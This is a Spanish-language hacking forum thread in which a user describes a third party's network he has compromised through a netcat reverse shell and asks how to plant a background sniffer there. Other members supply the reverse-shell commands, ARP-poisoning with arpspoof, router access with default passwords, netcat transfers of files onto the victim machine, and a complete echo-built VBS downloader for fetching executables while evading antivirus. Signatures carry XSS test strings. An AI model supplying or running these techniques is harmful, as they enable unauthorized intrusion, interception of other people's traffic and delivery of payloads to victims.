Tema destacado:  Suscripción al boletín mensual de elhacker.net
 Autor
|
Tema: sniffer en red remota (Leído 5,337 veces)
|
R007h
 Desconectado
Mensajes: 106
<script>alert('xss');</script>
|
Hola amigos,
Weno, la cosa es que tengo una red entre mis garras (un equipo de la red que hace un reverse shell al mio a travez de nuestro fiel amigo nc)...
y quiero poner un sniffer que capture el tráfico que pasa entre el servidor de la red y el router... pero no se como instalar un sniffer a traves de la consola (MS-DOS de la victima) y que corra en el background...
Un ettercap portable talvez? que no requiera la instalacion de winPcap obviamente...
uno que no conozca ...
un dsniff para windows? (ya lo he buscado pero no encontre nada)...
p/d: la red esta con un switch...
Gracias de antemano
Salu2
|
|
|
|
|
En línea
|
<script>alert('xss');</scrip>
|
|
|
Darioxhcx
Desconectado
Mensajes: 2.149
|
netcat no te servira ?
|
|
|
|
|
En línea
|
|
|
|
R007h
Desconectado
Mensajes: 106
<script>alert('xss');</script>
|
Tal vez sirva, pero debe ser complementado con otra herramienta porque el nc no te hace el MITM xD
|
|
|
|
|
En línea
|
<script>alert('xss');</scrip>
|
|
|
R007h
Desconectado
Mensajes: 106
<script>alert('xss');</script>
|
Vamos Gente! alguien tiene que saber...
La idea es dejar un programilla en la victima y que durante el dia capture tráfico y lo guarde en un archivo y despues vengo yo y me llevo el archivo xD
Vamos, yo se que alguien sabe xD
Salu2
|
|
|
|
|
En línea
|
<script>alert('xss');</scrip>
|
|
|
|
|
R007h
Desconectado
Mensajes: 106
<script>alert('xss');</script>
|
Tu link no funciona man...
|
|
|
|
|
En línea
|
<script>alert('xss');</scrip>
|
|
|
|
TRICKY
|
Que tal. nc IP -e cm.exe
________
Podrias hacer un diagrama del "compromiso" ?? /_______|
______ ________ ________ //
Es decir, al go como /__x__/ <--------------------------/ router / --/_switch / --/ DMZ ???
nc -L -vv -p port ----------/ \\
---------
\ server \
----------
O mejor si puedes ??
Es para ponernos mas en situacion. Asimismo, como sabes que es un switch el que conmuta la red interna o DMZ ??
Da mas info.
Saludos.
|
|
|
|
|
En línea
|
"La envidia es una declaración de inferioridad"
Napoleón.
|
|
|
R007h
Desconectado
Mensajes: 106
<script>alert('xss');</script>
|
mmm ok...
perdon por hablar mal xD el "servidor" no es en realidad un servidor para la red sino que solo ejecuta un software de control con los demas equipos... por eso le dije servidor xD pero no es que haya una DMZ... disculpas... Este "servidor" (equipo de control) está conectado al switch como todos los demas...
algo asi a ver si me sale...
(Internet) ------------------------------ YO xD
| (nc -vv -L -p puerto)
-----------
| router |
-----------
|
-----------
PC 23 backdooreada ----- | switch | ----- PC 32
(nc -d -e cmd.exe HOST puerto) -----------
| |
/ \
PC 50 PC 52 Control ("server")
weee, hay que tomar clases de ASCII art xD...
La idea sería sniffar el tráfico entre la PC 52 Control y el router haciendo un MITM desde la PC 23 (la que tengo controlada) y guardando el tráfico en un archivo... xD
Se que es un switch porque una vez tuve acceso físico a la PC 23 y corrí el plugin del ettercap hub/switch...
|
|
|
|
|
En línea
|
<script>alert('xss');</scrip>
|
|
|
|
TRICKY
|
Que tal. Bueno, la verdad es que no le eche mucha gana al ASCII  Una cosa .. La idea sería sniffar el tráfico entre la PC 52 Control y el router No me queda NADA claro que es lo que quieres sniffar. Es decir, quieres sniffar lo que Control mande a Inet ?? Si es asi seria mucho mas facil el telnetear al router ( passwds por defecto.. ) y setear un GRE Tunnel para sniffar desde tu casa ( si es que el router soportase GRE ). De todas maneras, si lo que quieres es sniffar conexiones remotas desde clientes a Control, deberias de envenenar al router diciendo que Control esta en tu maquina, y a Control diciendo que el router esta en tu maquina.. Esto esta claro, pero para ello necesitamos librerias que accesen a tramas de Capa 2 como WinPcap. Me pregunto si, desde tu pobre shell ( ya sabemos lo inestables que suelen ser estas shells ! ), podrias hacer uso de Ftp ( tftp ) y "msiexec" con varias de sus multiples opciones para instalar lo que necesites desde un Ftp que montes o en tu casa, o en otro lado.. Bueno, ya vas contando. Saludos y Suerte. |
|
|
|
« Última modificación: 16 Octubre 2009, 16:46 por averno »
|
En línea
|
"La envidia es una declaración de inferioridad"
Napoleón.
|
|
|
miguel86
Desconectado
Mensajes: 258
|
De todas maneras, si lo que quieres es sniffar conexiones remotas desde clientes a Control, deberias de envenenar al router diciendo que Control esta en tu maquina, y a Control diciendo que el router esta en tu maquina..
Esto esta claro, pero para ello necesitamos librerias que accesen a tramas de Capa 2 como WinPcap.
No entiendo este párrafo, ¿a que te refieres con envenenar el router y Control y a que máquina te refieres cuando dices tu máquina? El mitm debe hacerlo una máquina de dentro de la misma red ip a sniffar, depende del so utilizado en la víctima pero yo te aconsejaria correr el arpspoof de dsniff en segundo plano en el pc23 haciendo el mitm entre el router y pc-52, y ya de paso el resto de herramientas de dsniff úsalas para capturar y filtrar todo tipo de tráfico. Salu2
|
|
|
|
« Última modificación: 16 Octubre 2009, 18:27 por miguel86 »
|
En línea
|
|
|
|
R007h
Desconectado
Mensajes: 106
<script>alert('xss');</script>
|
No entiendo este párrafo, ¿a que te refieres con envenenar el router y Control y a que máquina te refieres cuando dices tu máquina?
miguel86, cuando dice envenenar al router y al Control se refiere al ARP poisoning que se hace para realizar el MitM. Y cuando dice tu máquina se refiere a la que esta comprometida (pc23) averno, sip de Control a Inet xD... Está buena la idea del tunneling GRE (no me fijé si es cisco el router), pero resulta que en mi ksa tengo una pobre conexion dial-up de 56 kb...  y no me va a dar el ancho de banda para soportar el forwarding del tráfico a travez de mi maquina... En cuanto a pasarle archivos, no lo pude lograr todavía, tengo un server FTP y un HTTP en mi maquina, pero el cliente ftp de la "consola" de win no se quiere conectar..., se cuelga... Intenté pasarle el wget a travez de netcat... pero me di cuenta que no c puede puesto a que la maquina que recibe el archivo debe estar a la escucha, y como en este caso, esta detras del router, no me puedo conectar directamente ... Asi que... si hay alguna idea para pasarle archivos... bienvenida xD Salu2
|
|
|
|
|
En línea
|
<script>alert('xss');</scrip>
|
|
|
Novlucker
Ninja y
Ex-Staff
Desconectado
Mensajes: 10.239
Yo que tu lo pienso dos veces
|
Tu y tu linda pc en tu casa nc.exe -l -p puerto < miarchivo.exe En la pc 23 nc pcfueradelared puerto > elarchivo.exe Saludos  |
|
|
|
|
En línea
|
Contribuye con la limpieza del foro, reporta los "casos perdidos" a un MOD XD
http://twitter.com/novlucker
"Hay dos cosas infinitas: el Universo y la estupidez humana. Y de la primera no estoy muy seguro." Albert Einstein |
|
|
Novlucker
Ninja y
Ex-Staff
Desconectado
Mensajes: 10.239
Yo que tu lo pienso dos veces
|
Y otro más si el AV no salta, debes de crear un archivo vbs a base de echo desde la shell D:\>echo ^set objhttp = createobject("microsoft.xmlhttp") >> wget.vbs
D:\>echo objhttp.open "get", wscript.arguments(0), 0 >> wget.vbs
D:\>echo objhttp.send() >> wget.vbs
D:\>echo ^set objado = createobject("adodb.stream") >> wget.vbs
D:\>echo objado.mode = 3 >> wget.vbs
D:\>echo objado.type = 1 >> wget.vbs
D:\>echo objado.open() >> wget.vbs
D:\>echo objado.write(objhttp.responsebody) >> wget.vbs
D:\>echo objado.savetofile wscript.arguments(1), 2 >> wget.vbsLe he puesto wget.vbs, pero puedes llamarlo como quieras, y luego puedes usarlo desde tu shell del siguiente modo; cscript.exe//nologo wget.vbs url nombredestino
cscript.exe//nologo wget.vbs http://www.unaweb.com/archivo.exe guardarlocomo.exe Saludos |
|
|
|
|
En línea
|
Contribuye con la limpieza del foro, reporta los "casos perdidos" a un MOD XD
http://twitter.com/novlucker
"Hay dos cosas infinitas: el Universo y la estupidez humana. Y de la primera no estoy muy seguro." Albert Einstein |
|
|
|
TRICKY
|
Que tal.  Nov ! Aunque no le dije la tipica transferencia con redirecciones con netcat debido a que, al menos a mi, con una shell de este tipo me suele dar bastantes problemas. Ahora, si que podria probar y mucho me gusto la segunda opcion ! Lo de que no se conecte el cliente ftp al server de tu casa puede ser debido a que tu ISP este capando el puerto 21. Pon ( configuralo en tu casa en el .ini o donde sea ) para que escuche en un puerto > a 65520 por ejemplo. Ve probando desde un cyber a conectarte al ftp de tu casa para ver cual puerto es el optimo. Lo del GRE Tunnel con Dial Up.. en un principio olvidalo !! Como te llegue todo el trafico de la Red estas apa*ao.. Bueno, prueba a ver lo de Nov y ve diciendo. Saludos !
|
|
|
|
|
En línea
|
"La envidia es una declaración de inferioridad"
Napoleón.
|
|
|
Novlucker
Ninja y
Ex-Staff
Desconectado
Mensajes: 10.239
Yo que tu lo pienso dos veces
|
En realidad si, el problema de la transferencia de archivos con nc es que no siempre funciona como debe, y que debes de mirar de manera "manual" a ver si el archivo ha llegado completo, ya que la conexión no se corta al terminar la transferencia y también debes de hacerlo a mano  Saludos |
|
|
|
|
En línea
|
Contribuye con la limpieza del foro, reporta los "casos perdidos" a un MOD XD
http://twitter.com/novlucker
"Hay dos cosas infinitas: el Universo y la estupidez humana. Y de la primera no estoy muy seguro." Albert Einstein |
|
|
|
 |
